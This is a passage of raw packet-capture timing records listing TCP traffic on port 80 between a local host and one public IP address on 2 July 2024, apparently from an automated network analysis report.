                    Jul 2, 2024 07:50:08.918796062 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918807030 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918817043 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.918818951 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918839931 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.918893099 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.919310093 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.919322014 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.919332027 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.919343948 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.919356108 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.919363976 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.919367075 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.919379950 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.919404984 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.919404984 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.971232891 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.258948088 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.258959055 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.258970022 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.258980036 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.258991003 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259006023 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259016991 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259022951 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.259031057 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259042025 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259052038 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259063005 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259072065 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.259073019 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259083986 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259094000 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259099960 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.259105921 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259118080 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.259143114 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.259855032 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259866953 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259876966 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259886980 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259896040 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.259897947 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259908915 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259918928 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259919882 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.259929895 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259941101 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259951115 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259953022 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.259962082 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259972095 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.259972095 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259984970 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259994984 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.259995937 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.260023117 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.260040998 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.260775089 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.260787010 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.260797977 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.260808945 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.260822058 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.260833025 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.260839939 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.260839939 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.260843992 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.260855913 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.260867119 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.260879040 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.260879040 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.260890007 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.260895967 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.260900974 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.260910988 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.260921955 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.260929108 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.260934114 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.260963917 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.260982037 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.261703968 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.261714935 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.261725903 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.261735916 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.261746883 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.261754990 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.261759043 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.261770010 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.261775017 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.261780977 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.261790991 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.261801958 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.261809111 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.261814117 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.261823893 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.261831045 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.261835098 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.261846066 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.261854887 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.261874914 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.261892080 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.262619019 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.262631893 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.262643099 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.262654066 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.262670040 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.262689114 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.263520002 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263530970 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263541937 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263551950 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263562918 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263573885 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263581038 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.263609886 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.263787031 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263798952 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263808966 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263819933 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263830900 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263839960 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.263840914 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263851881 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263854980 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.263863087 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263874054 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263890982 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.263909101 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.263915062 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263926983 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263937950 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263948917 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263959885 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.263962030 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263972998 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263983011 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.263989925 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.263993979 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.264008999 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.264019966 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.264023066 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.264059067 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.264801025 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.264812946 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.264822960 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.264833927 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.264839888 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.264843941 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.264856100 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.264868975 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.264873981 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.264883995 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.264894962 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.264899969 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.264906883 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.264925003 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.264930964 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.264950037 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.265058994 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.433996916 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434016943 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434060097 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.434067011 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434077978 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434129953 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.434190035 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434201002 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434211969 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434232950 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.434334993 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434345961 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434374094 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.434449911 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434462070 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434495926 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.434509993 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434520006 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434560061 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.434576035 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434591055 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434613943 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.434673071 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434684992 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434710979 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.434781075 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434792995 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434818983 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.434900999 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434911966 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434945107 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.434967041 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434982061 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.434993029 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.435003996 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.435009956 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.435029030 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.435126066 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.435169935 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.435270071 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.435307980 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.435318947 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.435345888 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.435451984 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.435463905 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.435473919 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.435488939 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.435508013 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.435580969 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.435592890 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.435602903 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.435615063 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.435626030 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.435659885 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.435746908 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.435944080 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.435981989 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.435992956 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.435992956 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.436039925 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.436065912 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.436078072 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.436093092 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.436104059 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.436132908 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.436167002 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.436235905 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.436248064 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.436285019 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.436358929 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.436369896 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.436381102 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.436392069 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.436400890 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.436403036 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.436444998 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:09.528433084 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:09.580595970 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:46.171652079 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:46.176597118 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:46.176676035 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:46.177380085 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:46.182164907 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:47.356218100 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:47.356235981 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:47.356250048 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:47.356290102 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:47.356314898 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:47.356772900 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:47.356785059 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:47.356796026 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:47.356853008 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:47.413511992 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:47.413527012 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:47.413537979 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:47.413548946 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.203495979 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.203505993 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.203517914 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.203531027 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.203537941 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.203558922 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.203587055 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.203809023 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.203821898 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.203833103 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.203845024 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.203856945 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.203857899 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.203869104 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.203881025 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.203891993 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.203905106 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.203917980 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.203917980 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.203941107 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.203960896 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.204236031 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.204247952 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.204257965 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.204269886 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.204293013 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.204328060 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.204457998 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.204471111 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.204487085 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.204499006 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.204509020 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.204513073 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.204538107 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.204551935 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.204714060 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.204732895 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.204745054 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.204756975 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.204766035 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.204768896 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.204799891 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.204833984 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.204843998 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.204886913 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.204992056 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.205004930 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.205015898 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.205027103 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.205038071 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.205046892 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.205049992 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.205061913 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.205073118 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.205079079 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.205081940 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.205102921 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.205142975 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.205496073 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.205508947 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.205521107 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.205533028 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.205544949 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.205550909 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.205558062 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.205569983 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.205580950 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.205583096 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.205593109 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.205602884 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.205604076 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.205629110 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.205647945 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.208323002 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.208373070 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.208385944 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.208398104 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.208430052 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.208462000 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.208496094 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.208509922 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.208520889 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.208533049 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.208539963 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.208575010 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.208616018 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.208628893 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.208642006 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.208651066 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.208663940 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.208719969 CEST4970780192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:49.208899975 CEST8049707103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:49.208911896 CEST8049707103.237.86.247192.168.2.7
